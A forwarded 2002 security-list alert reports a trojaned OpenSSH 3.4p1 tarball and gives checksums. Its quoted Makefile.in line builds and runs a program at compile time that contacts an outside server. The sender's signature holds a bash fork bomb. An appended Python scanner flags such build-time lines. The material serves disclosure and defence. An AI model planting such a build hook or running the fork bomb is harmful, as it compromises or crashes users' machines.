From: Edwin Groothuis (edwin_at_mavetju.org)
Date: Thu Aug 01 2002 - 02:35:12 CDT


    FYI (I'm not on -security)

    ----- Forwarded message from Edwin Groothuis <edwinmavetju.org> -----

    Date: Thu, 1 Aug 2002 16:55:51 +1000
    From: Edwin Groothuis <edwinmavetju.org>
    To: incidentssecurityfocus.com
    Subject: openssh-3.4p1.tar.gz trojaned

    Greetings,

    Just want to inform you that the OpenSSH package on ftp.openbsd.org
    (and probably all its mirrors now) is trojaned:

        ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

    The OpenBSD people have been informed about it (via email to
    deraadtopenbsd.org and via irc.openprojects.org/#openbsd)

    The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
     all: libopenbsd-compat.a
    + $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

    bf-test.c[1] is nothing more than a wrapper which generates a
    shell-script[2] which compiles itself and tries to connect to a
    server running on 203.62.158.32:6667 (web.snsonline.net).
      
    [1] http://www.mavetju.org/~edwin/bf-test.c
    [2] http://www.mavetju.org/~edwin/bf-output.sh

    This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
    ports system:
        MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

    This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
        MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

    Edwin

    -- 
    Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
    edwinmavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
    bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
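
The Makefile.in change reported above runs at build time, so it can be caught by reading a source tarball's Makefiles before anything is extracted or built. The following is an added example, not part of the original message: the regexes are heuristics assumed here, `scan_makefiles` and `make_sample` are hypothetical names, and the sample tarball is constructed in memory from the recipe line quoted in the message.

```python
import io
import re
import tarfile

# Heuristics (assumptions of this example) for recipe lines that execute code at build time.
SUSPICIOUS = [
    ("runs a program from the build directory", re.compile(r"(^|[;&|]\s*)\./[\w.-]+")),
    ("invokes a shell on a file", re.compile(r"(^|[;&|])\s*(ba)?sh\s+\S")),
    ("backgrounds a command", re.compile(r"(?<!&)&\s*$")),
]

def scan_makefiles(tar_bytes):
    """Return (member, line_no, reason, text) per suspicious recipe line; nothing is extracted to disk."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for member in tar:
            base = member.name.rsplit("/", 1)[-1]
            if not member.isfile() or not base.startswith("Makefile"):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for no, line in enumerate(text.splitlines(), 1):
                if not line.startswith("\t"):  # only tab-indented recipe lines are executed by make
                    continue
                for reason, rx in SUSPICIOUS:
                    if rx.search(line.strip()):
                        findings.append((member.name, no, reason, line.strip()))
    return findings

def make_sample(recipe_lines):
    """Build an in-memory tarball holding one Makefile.in (constructed test input)."""
    body = "all: libopenbsd-compat.a\n" + "".join("\t" + l + "\n" for l in recipe_lines)
    data = body.encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("openssh-3.4p1/openbsd-compat/Makefile.in")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

# Recipe line quoted in the message, and a constructed benign one for comparison.
TROJAN_LINE = "$(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &"
CLEAN_LINE = "$(AR) rv $@ $(OBJS)"

if __name__ == "__main__":
    for finding in scan_makefiles(make_sample([TROJAN_LINE])):
        print(finding)
```

Findings are leads for manual review, since legitimate build systems also run helper scripts; the checksum comparison in the message remains the primary check.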
    
